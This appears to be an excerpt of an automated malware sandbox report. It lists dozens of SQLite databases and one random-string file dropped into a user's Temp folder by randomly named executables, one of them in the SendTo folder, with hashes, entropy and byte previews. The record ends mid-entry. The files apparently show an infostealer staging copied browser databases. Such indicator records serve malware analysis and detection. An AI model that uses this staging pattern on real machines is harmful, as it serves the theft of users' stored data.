                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\lcZDo8ns4Q

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\mE3cCeVhhR

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\mcUqlbi2zj

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\n3HUb6Dcnq

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\n4uHs7LgWP

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\n8wlUfAaac

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\nWsTQa22Im

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\nkb0O85ct8

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\oYrjz3p3TI

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\oZyxTxWH9Y

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\olwGekzRH8

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\onfBqLbmN7

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\ouu3vSp5bP

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\paSXloORM2

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\pbXIvoDS8j

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\phBRXt5t4d

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\pjY45LNWlE

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\px9ZdIAvvR

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\qFzYN2YJ6M

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\qNed7Vo5YZ

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\qSCfccoR0a

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):25
                                          Entropy (8bit):4.483856189774723
                                          Encrypted:false
                                          SSDEEP:3:78HNdl7OtP:yPlS9
                                          MD5:A3C1AD7D6B4B1059C62E4B05629682A0
                                          SHA1:F29D6592A89D19C68D17D6222AB443E14AFF49B0
                                          SHA-256:49BDE8891A817F6CC0184F4C1B8FA2E1B9C40CC9A85794324DD5F3A6F5C33F2A
                                          SHA-512:124F0D0ABBAC7944A7B0C37E0A8BBBB72408A62803043222978AC8E0E581CA6CB3FB324C4A7D27D629BBFD7BB79EE35043DBF46C20A660C5D3DFD436D28580B1
                                          Malicious:false
                                          Preview:ZcqPuRbGTVMxgCfx3pKh9P7ej

                                          C:\Users\user\AppData\Local\Temp\r2IuxPwmgi

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\rc9co3folt

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\rqxdCJRPUs

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
